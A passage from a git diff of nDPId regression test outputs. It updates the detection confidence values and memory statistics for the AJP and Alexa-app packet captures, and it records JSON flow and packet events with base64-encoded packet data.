+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447} @@ -23,7 +23,7 @@ 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} @@ -34,8 +34,8 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1505154584618} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/26 @@ -45,9 +45,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871257 bytes -~~ total memory freed........: 5871257 bytes -~~ total allocations/frees...: 118144/118144 +~~ total memory allocated....: 6004891 bytes +~~ total memory freed........: 6004891 bytes +~~ total allocations/frees...: 120906/120906 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 202 chars ~~ json string max len.......: 1493 chars diff --git a/test/results/alexa-app.pcapng.out b/test/results/alexa-app.pcapng.out index 494c5023a..7cb783f22 100644 --- a/test/results/alexa-app.pcapng.out +++ b/test/results/alexa-app.pcapng.out @@ -6,148 +6,148 @@ 00294{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490976022731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"} -00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490976022731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"} 00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490976022741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} -00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490976022741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490976023264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28,51,58,59","class_ident":"dhcpcd-5.5.6"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28,51,58,59","class_ident":"dhcpcd-5.5.6"}} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490976023264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1490976023267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1490976023267,"pkt":"ePiC0\/vCAMDKkaPvCABFAAFIz1MAAEAR\/VesECoBrBAq2ABDAEQBNCIdAgEGAHxtfzEAAAAAAAAAAKwQKtisECoBAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgSsECoBMwQAAKjAOgQAAFRgOwQAAJOoAQT\/\/\/8AHASsECr\/AwSsECoBBgSsECoBDwNsYW7\/AAAA"} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1490976023731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 